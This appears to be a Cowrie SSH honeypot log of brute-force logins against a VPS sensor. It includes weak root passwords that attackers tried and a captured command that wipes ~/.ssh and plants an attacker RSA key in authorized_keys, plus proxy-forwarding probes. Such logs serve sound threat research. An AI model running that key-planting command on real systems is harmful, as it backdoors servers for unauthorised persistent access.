{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57052,"dst_ip":"1.2.3.4","dst_port":22,"session":"8ab58fb32868","protocol":"ssh","message":"New connection: 212.227.235.229:57052 (1.2.3.4:22) [session: 8ab58fb32868]","sensor":"my-vps","timestamp":"2025-09-08T14:23:50.678517Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:23:50.679120Z","src_ip":"212.227.235.229","session":"8ab58fb32868"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:23:50.929114Z","src_ip":"212.227.235.229","session":"8ab58fb32868"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T14:23:51.930844Z","src_ip":"212.227.235.229","session":"8ab58fb32868"}
{"eventid":"cowrie.session.closed","duration":12.86309289932251,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:23:52.460349Z","src_ip":"212.227.235.229","session":"d719630aa7fc"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:23:53.179334Z","src_ip":"212.227.235.229","session":"8ab58fb32868"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58154,"dst_ip":"1.2.3.4","dst_port":22,"session":"d002a55c83d9","protocol":"ssh","message":"New connection: 212.227.235.229:58154 (1.2.3.4:22) [session: d002a55c83d9]","sensor":"my-vps","timestamp":"2025-09-08T14:23:53.432135Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:23:53.433456Z","src_ip":"212.227.235.229","session":"d002a55c83d9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:23:53.679338Z","src_ip":"212.227.235.229","session":"d002a55c83d9"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T14:23:54.679848Z","src_ip":"212.227.235.229","session":"d002a55c83d9"}
{"eventid":"cowrie.session.closed","duration":"7.2","message":"Connection lost after 7.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:23:54.928323Z","src_ip":"212.227.235.229","session":"7e09a5c66cc0"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:23:54.929392Z","src_ip":"212.227.235.229","session":"d002a55c83d9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59285,"dst_ip":"1.2.3.4","dst_port":22,"session":"0ff7eebe3218","protocol":"ssh","message":"New connection: 212.227.235.229:59285 (1.2.3.4:22) [session: 0ff7eebe3218]","sensor":"my-vps","timestamp":"2025-09-08T14:24:11.108532Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:24:11.109641Z","src_ip":"212.227.235.229","session":"0ff7eebe3218"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59585,"dst_ip":"1.2.3.4","dst_port":22,"session":"9bac20f99418","protocol":"ssh","message":"New connection: 212.227.235.229:59585 (1.2.3.4:22) [session: 9bac20f99418]","sensor":"my-vps","timestamp":"2025-09-08T14:24:11.294794Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T14:24:11.295531Z","src_ip":"212.227.235.229","session":"9bac20f99418"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-09-08T14:24:11.453554Z","src_ip":"212.227.235.229","session":"9bac20f99418"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-09-08T14:24:11.928985Z","src_ip":"212.227.235.229","session":"9bac20f99418"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-09-08T14:24:12.087733Z","session":"9bac20f99418"}
{"eventid":"cowrie.session.connect","src_ip":"90.237.56.197","src_port":55527,"dst_ip":"1.2.3.4","dst_port":23,"session":"f8ad9c522c40","protocol":"telnet","message":"New connection: 90.237.56.197:55527 (1.2.3.4:23) [session: f8ad9c522c40]","sensor":"my-vps","timestamp":"2025-09-08T14:24:40.911492Z"}
{"eventid":"cowrie.session.closed","duration":12.821853399276733,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:24:53.733259Z","src_ip":"90.237.56.197","session":"f8ad9c522c40"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:25:21.294451Z","src_ip":"212.227.235.229","session":"9bac20f99418"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:25:21.311332Z","src_ip":"106.52.40.62","session":"b4f852a3938e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56012,"dst_ip":"1.2.3.4","dst_port":22,"session":"48dc6bda7b42","protocol":"ssh","message":"New connection: 212.227.235.229:56012 (1.2.3.4:22) [session: 48dc6bda7b42]","sensor":"my-vps","timestamp":"2025-09-08T14:25:42.720117Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:25:42.721156Z","src_ip":"212.227.235.229","session":"48dc6bda7b42"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:25:42.962976Z","src_ip":"212.227.235.229","session":"48dc6bda7b42"}
{"eventid":"cowrie.login.success","username":"root","password":"ASDasd123","message":"login attempt [root/ASDasd123] succeeded","sensor":"my-vps","timestamp":"2025-09-08T14:25:43.972872Z","src_ip":"212.227.235.229","session":"48dc6bda7b42"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T14:25:44.509974Z","src_ip":"212.227.235.229","session":"48dc6bda7b42"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T14:25:44.510806Z","src_ip":"212.227.235.229","session":"48dc6bda7b42"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T14:25:44.511764Z","src_ip":"212.227.235.229","session":"48dc6bda7b42"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:25:44.754603Z","src_ip":"212.227.235.229","session":"48dc6bda7b42"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T14:25:45.254334Z","src_ip":"212.227.235.229","session":"48dc6bda7b42"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T14:25:45.255251Z","src_ip":"212.227.235.229","session":"48dc6bda7b42"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T14:25:45.498605Z","src_ip":"212.227.235.229","session":"48dc6bda7b42"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:25:45.499694Z","src_ip":"212.227.235.229","session":"48dc6bda7b42"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56014,"dst_ip":"1.2.3.4","dst_port":22,"session":"462d92048bea","protocol":"ssh","message":"New connection: 212.227.235.229:56014 (1.2.3.4:22) [session: 462d92048bea]","sensor":"my-vps","timestamp":"2025-09-08T14:25:45.741261Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:25:45.742172Z","src_ip":"212.227.235.229","session":"462d92048bea"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:25:45.984122Z","src_ip":"212.227.235.229","session":"462d92048bea"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T14:25:46.997821Z","src_ip":"212.227.235.229","session":"462d92048bea"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:25:48.242939Z","src_ip":"212.227.235.229","session":"462d92048bea"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57696,"dst_ip":"1.2.3.4","dst_port":22,"session":"e50451702d7f","protocol":"ssh","message":"New connection: 212.227.235.229:57696 (1.2.3.4:22) [session: e50451702d7f]","sensor":"my-vps","timestamp":"2025-09-08T14:25:48.505913Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:25:48.506893Z","src_ip":"212.227.235.229","session":"e50451702d7f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:25:48.760851Z","src_ip":"212.227.235.229","session":"e50451702d7f"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T14:25:49.816826Z","src_ip":"212.227.235.229","session":"e50451702d7f"}
{"eventid":"cowrie.session.closed","duration":"7.3","message":"Connection lost after 7.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:25:50.060309Z","src_ip":"212.227.235.229","session":"48dc6bda7b42"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:25:50.071466Z","src_ip":"212.227.235.229","session":"e50451702d7f"}
{"eventid":"cowrie.session.connect","src_ip":"193.105.134.95","src_port":33258,"dst_ip":"1.2.3.4","dst_port":22,"session":"8310517cb39a","protocol":"ssh","message":"New connection: 193.105.134.95:33258 (1.2.3.4:22) [session: 8310517cb39a]","sensor":"my-vps","timestamp":"2025-09-08T14:26:13.417872Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.4.8","message":"Remote SSH version: SSH-2.0-libssh_0.4.8","sensor":"my-vps","timestamp":"2025-09-08T14:26:13.418882Z","src_ip":"193.105.134.95","session":"8310517cb39a"}
{"eventid":"cowrie.client.kex","hassh":"a7a87fbe86774c2e40cc4a7ea2ab1b3c","hasshAlgorithms":"diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: a7a87fbe86774c2e40cc4a7ea2ab1b3c","sensor":"my-vps","timestamp":"2025-09-08T14:26:13.463515Z","src_ip":"193.105.134.95","session":"8310517cb39a"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-09-08T14:26:14.390178Z","src_ip":"193.105.134.95","session":"8310517cb39a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"142.250.74.78","dst_port":80,"src_ip":"193.105.134.95","src_port":8945,"message":"direct-tcp connection request to 142.250.74.78:80 from 127.0.0.1:8945","sensor":"my-vps","timestamp":"2025-09-08T14:26:14.435501Z","session":"8310517cb39a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"142.250.74.78","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 142.250.74.78:80 with data b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-09-08T14:26:14.480088Z","src_ip":"193.105.134.95","session":"8310517cb39a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2a00:1450:400f:802::200e","dst_port":80,"src_ip":"193.105.134.95","src_port":29268,"message":"direct-tcp connection request to 2a00:1450:400f:802::200e:80 from 127.0.0.1:29268","sensor":"my-vps","timestamp":"2025-09-08T14:26:14.610952Z","session":"8310517cb39a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2a00:1450:400f:802::200e","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2a00:1450:400f:802::200e:80 with data b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-09-08T14:26:14.656372Z","src_ip":"193.105.134.95","session":"8310517cb39a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"193.105.134.95","src_port":26716,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:26716","sensor":"my-vps","timestamp":"2025-09-08T14:26:14.787003Z","session":"8310517cb39a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-09-08T14:26:14.831626Z","src_ip":"193.105.134.95","session":"8310517cb39a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"193.105.134.95","src_port":19295,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:19295","sensor":"my-vps","timestamp":"2025-09-08T14:26:14.962887Z","session":"8310517cb39a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":3,"message":"discarded direct-tcp forward request 3 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-09-08T14:26:15.007601Z","src_ip":"193.105.134.95","session":"8310517cb39a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"77.88.55.88","dst_port":80,"src_ip":"193.105.134.95","src_port":16786,"message":"direct-tcp connection request to 77.88.55.88:80 from 127.0.0.1:16786","sensor":"my-vps","timestamp":"2025-09-08T14:26:15.138930Z","session":"8310517cb39a"}
